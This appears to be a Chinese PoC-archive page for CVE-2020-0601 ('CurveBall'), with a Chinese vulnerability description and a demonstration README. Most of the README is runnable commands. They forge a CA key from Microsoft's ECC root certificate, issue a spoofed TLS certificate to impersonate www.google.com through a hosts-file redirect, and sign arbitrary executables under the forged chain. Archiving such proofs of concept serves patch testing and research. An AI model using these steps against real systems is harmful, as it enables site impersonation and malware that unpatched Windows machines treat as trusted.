关联漏洞
标题:Microsoft Windows CryptoAPI 信任管理问题漏洞 (CVE-2020-0601)Description:Microsoft Windows CryptoAPI是美国微软(Microsoft)公司的一个在Windows 操作系统中添加的密码编译机能。作为资料加密与解密功能的重要基础,CryptoAPI 支持同步,异步的密钥加密处理,以及操作系统中的数字证书 的管理工作。 Microsoft Windows CryptoAPI (Crypt32.dll)中验证椭圆曲线加密(ECC)证书的方法存在信任管理问题漏洞。攻击者可通过使用欺骗性的代码签名证书利用该漏洞签名恶意的可执行文件。以下产品及版本受到影响:Micr
Description
Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall
介绍
# Based on POC's https://github.com/ly4k/CurveBall
# https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/
# https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file
-----------------------------
# REQUIREMENTS/SOFFTWARE USED
-----------------------------
python version 3.11
openssl version 3.1
osslsigncode version 2.5
python libraries in gen-key.py httpServer.py
-------------------------
# TLS CERTIFICATE SIGNING
-------------------------
# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf
# Create another SSL certificate (of any kind) that will be signed by the spoofed CA
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
# Create a certificate signing request for the certificate
openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req
# Sign the CSR using the spoofed CA certificate
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req
# Start a HTTPS server with the spoofed certificate chain
python httpServer.py
# IN WINDOWS MACHINE
# Add <kali.machine.ip> www.google.com to the hosts file (redirects google to the server)
# visit HTTPS://www.google.com
# Certificate should be trusted, and 'Hello World' should be displayed
# If error occurs, check system time is correct
--------------
# CODE SIGNING
--------------
# Create a spoofed CA key from the trusted root certificate (must be secp384r1 and in PEM format)
python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer
# Create a spoofed CA using the spoofed key
openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf
# Create a new key that can be used for code signing
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
# Create a certificate signing request using the key, which we can sign
openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req
# Sign the CSR using the spoofed CA
openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req
# Pack the key, certificate, and spoofed CA into a PKCS12 file for signing exes
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12
# Use the PKCS12 file to sign an executable
osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe
文件快照
[4.0K] /data/pocs/5c8916825a7a05bf7cafd82e629f278a53fce050
├── [4.0K] curveball
│ ├── [ 110] ca.cnf
│ ├── [ 110] ca-cs.cnf
│ ├── [4.5K] gen-key.py
│ ├── [ 855] httpServer.py
│ ├── [1.1K] MicrosoftECCProductRootCertificateAuthority.cer
│ ├── [ 336] openssl.cnf
│ ├── [ 302] openssl-cs.cnf
│ └── [2.7K] README
├── [520K] curveball-demo-steps.pdf
└── [2.7K] README.md
1 directory, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。